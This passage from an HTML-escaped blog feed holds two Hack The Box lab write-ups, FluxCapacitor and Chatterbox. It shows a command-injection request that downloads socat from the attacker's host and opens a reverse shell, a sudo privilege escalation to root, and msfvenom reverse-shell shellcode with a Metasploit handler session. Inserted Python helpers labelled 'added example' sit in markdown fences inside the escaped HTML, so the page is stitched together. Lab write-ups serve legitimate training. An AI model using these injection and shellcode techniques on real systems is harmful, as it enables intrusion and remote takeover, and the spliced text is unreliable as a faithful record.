&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;curl &lt;span class=&quot;s2&quot;&gt;&quot;http://10.10.10.69/sync?opt='? c&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\u\r&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;l 10.10.14.27:9999 '&quot;&lt;/span&gt;
wget -q http://10.10.14.27:9999/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat &lt;span class=&quot;nb&quot;&gt;exec&lt;/span&gt;:&lt;span class=&quot;s1&quot;&gt;'bash -li'&lt;/span&gt;,pty,stderr,setsid,sigint,sane tcp:10.10.14.27:8282
bash: -c: option requires an argument
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;curl &lt;span class=&quot;s2&quot;&gt;&quot;http://10.10.10.69/sync?opt='? c&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\u\r&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;l 10.10.14.27:9999 -o /tmp/a'&quot;&lt;/span&gt;
bash: -c: option requires an argument
&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;curl &lt;span class=&quot;s2&quot;&gt;&quot;http://10.10.10.69/sync?opt='? b&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\a\s\h&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt; /tmp/a '&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@dastinia:~/htb/fluxcapacitor# &lt;/span&gt;socat file:&lt;span class=&quot;sb&quot;&gt;`&lt;/span&gt;tty&lt;span class=&quot;sb&quot;&gt;`&lt;/span&gt;,raw,echo&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;0 tcp-listen:8282
&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/$ &lt;/span&gt;id
&lt;span class=&quot;nv&quot;&gt;uid&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;65534&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;nobody&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;gid&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;65534&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;nogroup&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;groups&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;65534&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;nogroup&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
nobody@fluxcapacitor:/&lt;span class=&quot;err&quot;&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/FluxCapacitorInc$ &lt;/span&gt;ls -la
total 12
drwxr-xr-x 2 nobody root 4096 Dec  5 14:58 .
drwxr-xr-x 4 root   root 4096 Dec  5 14:58 ..
-rw-r--r-- 1 root   root   33 Dec  5 14:58 user.txt
&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/FluxCapacitorInc$ &lt;/span&gt;cat user.txt
&lt;span class=&quot;o&quot;&gt;[&lt;/span&gt;redacted]
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;privesc--getting-root&quot;&gt;Privesc &amp;amp; Getting Root&lt;/h3&gt;
&lt;p&gt;One of the first things I always do whenever I get on a box is run &lt;code class=&quot;highlighter-rouge&quot;&gt;sudo -l&lt;/code&gt; to see what sudo commands the current user can run. On a good number of boxes, running this first can potentially save you a whole lot of time while privescing…&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/FluxCapacitorInc$ &lt;/span&gt;sudo -l
Matching Defaults entries &lt;span class=&quot;k&quot;&gt;for &lt;/span&gt;nobody on fluxcapacitor:
    env_reset, mail_badpass,
    &lt;span class=&quot;nv&quot;&gt;secure_path&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;/usr/local/sbin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/usr/local/bin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/usr/sbin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/usr/bin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/sbin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/bin&lt;span class=&quot;se&quot;&gt;\:&lt;/span&gt;/snap/bin

User nobody may run the following commands on fluxcapacitor:
    &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;ALL&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; ALL
    &lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;root&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; NOPASSWD: /home/themiddle/.monit
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;So in this case it looks like we can run whatever &lt;code class=&quot;highlighter-rouge&quot;&gt;/home/themiddle/.monit&lt;/code&gt; is as the &lt;code class=&quot;highlighter-rouge&quot;&gt;root&lt;/code&gt; user, so this very likely is our path for privesc. Let’s see what this file contains…&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/FluxCapacitorInc$ &lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;cd&lt;/span&gt; /home/themiddle/
&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/themiddle$ &lt;/span&gt;cat .monit
&lt;span class=&quot;c&quot;&gt;#!/bin/bash&lt;/span&gt;

&lt;span class=&quot;k&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;[&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$1&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;cmd&quot;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;]&lt;/span&gt;; &lt;span class=&quot;k&quot;&gt;then
        &lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Trying to execute &lt;/span&gt;&lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;CMD&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;$(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;echo&lt;/span&gt; -n &lt;span class=&quot;k&quot;&gt;${&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;}&lt;/span&gt; | base64 -d&lt;span class=&quot;k&quot;&gt;)&lt;/span&gt;
        bash -c &lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$CMD&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;fi&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;From the look of it, &lt;code class=&quot;highlighter-rouge&quot;&gt;.monit&lt;/code&gt; takes a first argument of &lt;code class=&quot;highlighter-rouge&quot;&gt;cmd&lt;/code&gt;, after which you pass a &lt;code class=&quot;highlighter-rouge&quot;&gt;base64&lt;/code&gt; encoded string of whatever you want (your command); it then &lt;code class=&quot;highlighter-rouge&quot;&gt;base64 decodes&lt;/code&gt; the value &amp;amp; passes the result into &lt;code class=&quot;highlighter-rouge&quot;&gt;bash -c $value&lt;/code&gt;. We can very easily use this script to get ourselves a root shell with little effort.&lt;/p&gt;
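&lt;p&gt;The misconfiguration above is easy to spot mechanically. As an added example that is not the write-up's code, the script below parses &lt;code class=&quot;highlighter-rouge&quot;&gt;sudo -l&lt;/code&gt; output and flags entries that deserve review: targets outside the system bin directories (a script under &lt;code class=&quot;highlighter-rouge&quot;&gt;/home&lt;/code&gt; is controlled by whoever owns that home), NOPASSWD rules, interpreters, wildcards, and blanket &lt;code class=&quot;highlighter-rouge&quot;&gt;ALL&lt;/code&gt; grants. The sample is constructed in the same layout as the write-up's output, with one harmless entry added for contrast.&lt;/p&gt;

```python
"""Flag risky entries in `sudo -l` output.

Added example, not code from the write-up. The sample below is
constructed in the same layout as the write-up's `sudo -l` output, with
one harmless entry added for contrast. The pattern to catch is the
write-up's `(root) NOPASSWD: /home/themiddle/.monit`: a rule whose
target lives under a user's home directory, runs without a password,
and (as the script's own source shows) hands its argument to `bash -c`,
which is a root shell by another name.
"""
import re

SAMPLE_SUDO_L = """\
Matching Defaults entries for nobody on fluxcapacitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nobody may run the following commands on fluxcapacitor:
    (ALL) ALL
    (root) NOPASSWD: /home/themiddle/.monit
    (root) /usr/bin/systemctl restart nginx
"""

# groups: runas, optional "TAG: " prefixes, command
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z_]+:\s*)*)(.+?)\s*$")
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
               "/usr/local/bin/", "/usr/local/sbin/")
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "env"}


def parse_sudo_l(text):
    """Return the command entries that follow the 'may run' header."""
    entries, in_commands = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = ENTRY_RE.match(line)
        if m:
            tags = [t.strip() for t in m.group(2).split(":") if t.strip()]
            entries.append({"runas": m.group(1), "tags": tags, "cmd": m.group(3)})
    return entries


def assess(entry):
    """Reasons an entry deserves review; an empty list means nothing stood out."""
    reasons = []
    cmd = entry["cmd"]
    prog = cmd.split()[0]
    if cmd == "ALL":
        reasons.append("any command")
    elif not prog.startswith(SYSTEM_DIRS):
        reasons.append("target outside system bin dirs: " + prog)
    if prog.rsplit("/", 1)[-1] in INTERPRETERS:
        reasons.append("target is an interpreter")
    if "NOPASSWD" in entry["tags"]:
        reasons.append("no password required")
    if "*" in cmd:
        reasons.append("wildcard in arguments")
    return reasons


def risky_entries(text):
    """(command, reasons) for every entry with at least one reason."""
    found = []
    for entry in parse_sudo_l(text):
        reasons = assess(entry)
        if reasons:
            found.append((entry["cmd"], reasons))
    return found


if __name__ == "__main__":
    for cmd, reasons in risky_entries(SAMPLE_SUDO_L):
        print("%-40s %s" % (cmd, "; ".join(reasons)))
```

&lt;p&gt;A path check like this is only a first pass; on a live host you would also confirm the target is root-owned and not writable by the invoking user, and read the script itself, since a root-owned file that runs &lt;code class=&quot;highlighter-rouge&quot;&gt;bash -c&lt;/code&gt; on its arguments is just as bad as a user-owned one.&lt;/p&gt;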

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/themiddle$ &lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;/bin/bash&quot;&lt;/span&gt; | base64
&lt;span class=&quot;nv&quot;&gt;L2Jpbi9iYXNoCg&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;==&lt;/span&gt;
&lt;span class=&quot;gp&quot;&gt;nobody@fluxcapacitor:/home/themiddle$ &lt;/span&gt;sudo /home/themiddle/.monit cmd &lt;span class=&quot;nv&quot;&gt;L2Jpbi9iYXNoCg&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;==&lt;/span&gt;
Trying to execute &lt;span class=&quot;nv&quot;&gt;L2Jpbi9iYXNoCg&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;==&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Root :D&lt;/p&gt;

&lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;gp&quot;&gt;root@fluxcapacitor:/home/themiddle# &lt;/span&gt;id
&lt;span class=&quot;nv&quot;&gt;uid&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;0&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;root&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;gid&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;0&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;root&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;groups&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;=&lt;/span&gt;0&lt;span class=&quot;o&quot;&gt;(&lt;/span&gt;root&lt;span class=&quot;o&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;gp&quot;&gt;root@fluxcapacitor:/home/themiddle# &lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;cd&lt;/span&gt; /root
&lt;span class=&quot;gp&quot;&gt;root@fluxcapacitor:~# &lt;/span&gt;cat root.txt
...[redacted]...
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Hope this helped :D&lt;/p&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><summary type="html">Intro FluxCapacitor was both a pretty interesting, but annoying &amp;amp; the frustrating box while I was doing it my first time around – mainly due to my lack of experience with wfuzz. Overall once I finally completed the box, and completed a second take on it, flux taught me quite a few tricks, especially when it came to web fuzzing utilities. I highly recommend you take a crack at it if you have the time.</summary></entry><entry><title type="html">Hack the Box - Chatterbox Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-chatterbox-writeup/" rel="alternate" type="text/html" title="Hack the Box - Chatterbox Write up" /><published>2018-05-13T00:00:00-04:00</published><updated>2018-05-13T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-chatterbox-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/05/13/hackthebox-chatterbox-writeup/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/chatterbox/3.png&quot; alt=&quot;&amp;quot;Chatterbox&amp;quot;&quot; title=&quot;Chatterbox&quot; /&gt;&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used.&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/msfvenom/&quot;&gt;Msfvenom&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.exploit-db.com/searchsploit/&quot;&gt;SearchSploit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;

&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;

&lt;p&gt;Like with every box, let’s start off with an nmap scan against the Chatterbox machine (10.10.10.74)…&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/chatterbox# nmap -T4 -sC -sV -n 10.10.10.74 -oA chatterbox_inital_scan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 21:50 EDT
Stats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 45.00% done; ETC: 21:53 (0:01:28 remaining)
Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.00% done; ETC: 21:53 (0:01:25 remaining)
Nmap scan report for 10.10.10.74
Host is up (0.16s latency).
All 1000 scanned ports on 10.10.10.74 are filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.17 seconds
root@dastinia:~/htb/chatterbox#
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Interestingly enough, there were no ports alive… There might be some sort of filtering taking place on the box, or it’s getting destroyed by other HTB users, so I ran a slower full port scan against the box.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/chatterbox# cat chatterbox_min_rate_500.nmap
# Nmap 7.70 scan initiated Tue May 22 22:12:31 2018 as: nmap -sC -sV -n -sT -p- --min-rate 500 -oA chatterbox_min_rate_500 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
9255/tcp open  mon?
9256/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 22 22:18:41 2018 -- 1 IP address (1 host up) scanned in 370.95 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Interestingly, we are getting responses on two ports, but with no useful information as to what service is running on them.
I’m going to scan (yet again) to further enumerate what the service is, but this time we are going to run it at a &lt;code class=&quot;highlighter-rouge&quot;&gt;T2&lt;/code&gt; rate in case the firewall is dropping traffic due to speed.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/chatterbox# nmap -T2  --max-retries 5 -sV -sC -p9255,9256 10.10.10.74 -oA chatterbox_p9255-9256_sc
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 22:34 EDT
Nmap scan report for 10.10.10.74
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;enumerating-port-9255-achat-chat-system-httpd&quot;&gt;Enumerating Port 9255 (AChat Chat System httpd)&lt;/h3&gt;

&lt;p&gt;If you do some research on “AChat” you discover a few CVEs for the application, including a buffer overflow exploit for &lt;a href=&quot;https://www.exploit-db.com/exploits/36025/&quot;&gt;AChat version 0.150 beta7&lt;/a&gt;, which you can find on searchsploit/exploit-db.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/chatterbox/2.png&quot; alt=&quot;&amp;quot;SearchSploit Output for AChat&amp;quot;&quot; title=&quot;SearchSploit Output for AChat&quot; /&gt;&lt;/p&gt;

&lt;p&gt;After some quick googling and looking at the &lt;a href=&quot;https://sourceforge.net/projects/achat/?source=navbar&quot;&gt;AChat project’s sourceforge&lt;/a&gt; page, you will discover that the last version of AChat to be released was &lt;code class=&quot;highlighter-rouge&quot;&gt;AChat 0.150 beta7&lt;/code&gt;. So there’s a pretty high chance that this is the version of the software running on Chatterbox.&lt;/p&gt;

&lt;h3 id=&quot;modifying-exploit-shellcode--testing-locally&quot;&gt;Modifying Exploit ShellCode &amp;amp; Testing Locally&lt;/h3&gt;

&lt;p&gt;One of the first things I pay attention to is the architecture of the machine that this exploit was tested or developed for (in this case Windows 7 32-bit), and what the POC exploit code executes when it triggers. Usually the exploit developer will let you know what versions of &lt;em&gt;“x”&lt;/em&gt; the exploit was tested as working on. For this exploit, the developer generated shellcode to launch the calculator program when the exploit triggers. This is pretty useless to us, so we are going to drop-in-replace the &lt;code class=&quot;highlighter-rouge&quot;&gt;exec/calc&lt;/code&gt; shellcode with a simple &lt;code class=&quot;highlighter-rouge&quot;&gt;reverse shell&lt;/code&gt; payload and go from there.&lt;/p&gt;

&lt;p&gt;I downloaded a copy of the vulnerable AChat program, and ran it on a 64-bit Windows 7 virtual machine.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;generating windows reverse shell shellcode with msfvenom&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/chatterbox# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp  LHOST=192.168.30.130 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 808 (iteration=0)
x86/unicode_mixed chosen with final size 808
Payload size: 808 bytes
Final size of python file: 3872 bytes
buf =  &quot;&quot;
buf += &quot;\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49&quot;
buf += &quot;\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41&quot;
buf += &quot;\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41&quot;
buf += &quot;\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51&quot;
buf += &quot;\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31&quot;
buf += &quot;\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41&quot;
buf += &quot;\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41&quot;
buf += &quot;\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41&quot;
buf += &quot;\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41&quot;
buf += &quot;\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x69\x58\x32\x62&quot;
buf += &quot;\x49\x70\x39\x70\x6d\x30\x4f\x70\x62\x69\x48\x65\x30&quot;
buf += &quot;\x31\x79\x30\x71\x54\x64\x4b\x52\x30\x6c\x70\x42\x6b&quot;
...Snip....
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
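&lt;p&gt;Before pasting the generated &lt;code class=&quot;highlighter-rouge&quot;&gt;buf&lt;/code&gt; into the PoC it is worth checking it mechanically against the constraints the exploit imposes. The following Python helper is an added example, not code from the original write-up or from the exploit-db PoC: it parses msfvenom’s &lt;code class=&quot;highlighter-rouge&quot;&gt;-f python&lt;/code&gt; output back into bytes, flags any byte from the bad-character list used above (null and &lt;code class=&quot;highlighter-rouge&quot;&gt;0x80&lt;/code&gt; to &lt;code class=&quot;highlighter-rouge&quot;&gt;0xff&lt;/code&gt;), and shows what the target’s wide-character conversion does to a clean payload. The three sample lines are copied from the msfvenom output above; the “dirty” sample and the &lt;code class=&quot;highlighter-rouge&quot;&gt;max_len&lt;/code&gt; parameter are constructed for illustration, since the page does not state how much room the PoC has for shellcode.&lt;/p&gt;

```python
import re

# Bad characters taken from the PoC's msfvenom command: NUL plus every byte 0x80-0xff.
# The vulnerable AChat code widens the attacker's input to UTF-16 before it overflows,
# so only 7-bit ASCII bytes survive the trip and a NUL terminates the string early.
BADCHARS = frozenset([0x00] + list(range(0x80, 0x100)))

# Three lines copied from the msfvenom output above, used as sample input.
SAMPLE_CLEAN = r'''
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
'''

# Constructed sample of a payload that was NOT generated with the right -b list.
SAMPLE_DIRTY = r'''
buf =  ""
buf += "\x50\x00\x59\x90\x41"
'''

_LINE = re.compile(r'buf\s*\+?=\s*"((?:\\x[0-9a-fA-F]{2})*)"')
_BYTE = re.compile(r'\\x([0-9a-fA-F]{2})')


def parse_msfvenom_python(text):
    '''Rebuild the raw payload bytes from msfvenom's "-f python" output.'''
    out = bytearray()
    for line in _LINE.finditer(text):
        out.extend(int(h, 16) for h in _BYTE.findall(line.group(1)))
    return bytes(out)


def find_badchars(payload, badchars=BADCHARS):
    '''Return (offset, byte) for every byte the target would mangle or truncate on.'''
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def widen_to_utf16le(payload):
    '''Mimic the target's wide-char conversion: every clean byte becomes XX 00.

    This is why the PoC needs a unicode-aware encoder (x86/unicode_mixed) and a
    register pointing at the buffer (BufferRegister=EAX): the decoder stub has to
    execute with a NUL interleaved after every byte of the original payload.'''
    if find_badchars(payload):
        raise ValueError('payload contains bytes that will not survive widening')
    return payload.decode('ascii').encode('utf-16-le')


def check_payload(text, max_len=None):
    '''Parse msfvenom output and report whether it is safe to drop into the exploit.

    max_len is the room the PoC has for shellcode. The page does not state it, so
    pass the value from the exploit you are editing (hypothetical parameter).'''
    payload = parse_msfvenom_python(text)
    bad = find_badchars(payload)
    too_long = max_len is not None and len(payload) > max_len
    return {'size': len(payload), 'badchars': bad, 'ok': not bad and not too_long}


if __name__ == '__main__':
    for name, sample in (('clean', SAMPLE_CLEAN), ('dirty', SAMPLE_DIRTY)):
        result = check_payload(sample)
        print(name, result['size'], 'bytes, bad bytes at:', result['badchars'])
```

&lt;p&gt;Save the full msfvenom output to a file and feed its contents to &lt;code class=&quot;highlighter-rouge&quot;&gt;check_payload&lt;/code&gt;; an empty &lt;code class=&quot;highlighter-rouge&quot;&gt;badchars&lt;/code&gt; list and a size that fits the PoC’s buffer is what you want before you touch the remote target. Running the check first is the quickest way to tell a mangled payload apart from a crashed service when the reverse shell does not come back.&lt;/p&gt;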

&lt;p&gt;&lt;em&gt;After executing the modified exploit…&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf exploit(multi/handler) &amp;gt; set PAYLOAD windows/shell/reverse_tcp
PAYLOAD =&amp;gt; windows/shell/reverse_tcp
msf exploit(multi/handler) &amp;gt; set LHOST 192.168.30.130
LHOST =&amp;gt; 192.168.30.130
msf exploit(multi/handler) &amp;gt; set LPORT 8282
LPORT =&amp;gt; 8282
msf exploit(multi/handler) &amp;gt; exploit -j -z
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 192.168.30.130:8282

[*] Command shell session 2 opened (192.168.30.130:8282 -&amp;gt; 192.168.30.141:49389) at 2018-05-26 16:44:36 -0400
msf exploit(multi/handler) &amp;gt; sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  192.168.30.130:8282 -&amp;gt; 192.168.30.141:49388 (192.168.30.141)
  2         shell x86/windows                                                                                    192.168.30.130:8282 -&amp;gt; 192.168.30.141:49389 (192.168.30.141)


msf exploit(multi/handler) &amp;gt; sessions -i 2
